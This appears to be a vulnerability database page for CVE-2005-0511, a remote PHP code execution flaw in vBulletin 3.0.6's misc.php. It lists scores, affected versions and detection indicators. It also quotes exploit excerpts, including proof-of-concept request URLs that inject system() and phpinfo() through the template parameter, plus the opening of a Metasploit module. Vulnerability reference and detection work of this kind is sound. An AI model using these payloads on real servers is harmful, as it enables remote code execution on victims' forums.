CVE-2005-0511
published 2005-02-21CVE-2005-0511: misc.php for vBulletin 3.0.6 and earlier, when "Add Template Name in HTML Comments" is enabled, allows remote attackers to execute arbitrary PHP code via…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
35.82%
98.3th percentile
misc.php for vBulletin 3.0.6 and earlier, when "Add Template Name in HTML Comments" is enabled, allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter.
Affected
29 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
| jelsoft | vbulletin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect GET requests to misc.php where the 'template' parameter contains nested variable/function injection patterns such as {${...}} ↗
- →Look for the query string pattern do=page&template= with PHP function calls (passthru, system, phpinfo) encoded or plaintext inside double-brace variable syntax ↗
- →The exploit encodes the command as a chain of chr() calls joined by dots to bypass filters; detect passthru() calls with chr()-encoded arguments in the template parameter ↗
- →The vulnerability is only triggerable when 'Add Template Name in HTML Comments' is enabled in vBulletin configuration; audit this setting as a risk indicator ↗
- →The Metasploit check method sends 'echo ownable' via the payload; presence of the string 'ownable' in the HTTP response body indicates successful code execution ↗
- ·The vulnerability is only exploitable when the 'Add Template Name in HTML Comments' vBulletin option is enabled; disabling this setting mitigates the attack surface ↗
- ·The Metasploit module explicitly disables HTTP::junk_slashes as it interferes with reliable exploitation ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-0511 vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
---
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'vBulletin misc.php Template Name Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary PHP code execution flaw in
the vBulletin web forum software. This vulnerability is only
present when the "Add Template Name in HTML Comments" option
is enabled. All versions of vBulletin prior to 3.0.7 are
affected.
},
'Author' =>
[
'
Exploit-DB
vBulletin 3.0.6 - PHP Code Injection
exploitdb·2005-02-22
CVE-2005-0511 vBulletin 3.0.6 - PHP Code Injection
vBulletin 3.0.6 - PHP Code Injection
---
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#
# [SCAN Associates Security Advisory]
# http://www.scan-associates.net
Proof of concept
http://site.com/misc.php?do=page&template={${phpinfo()}}
# milw0rm.com [2005-02-22]
Metasploit
vBulletin misc.php Template Name Arbitrary Code Execution
metasploit
vBulletin misc.php Template Name Arbitrary Code Execution
vBulletin misc.php Template Name Arbitrary Code Execution
This module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=110910899415763&w=2http://secunia.com/advisories/14326http://www.securityfocus.com/bid/12622http://www.vbulletin.com/forum/showthread.php?postid=819562http://marc.info/?l=bugtraq&m=110910899415763&w=2http://secunia.com/advisories/14326http://www.securityfocus.com/bid/12622http://www.vbulletin.com/forum/showthread.php?postid=819562
2005-02-21
Published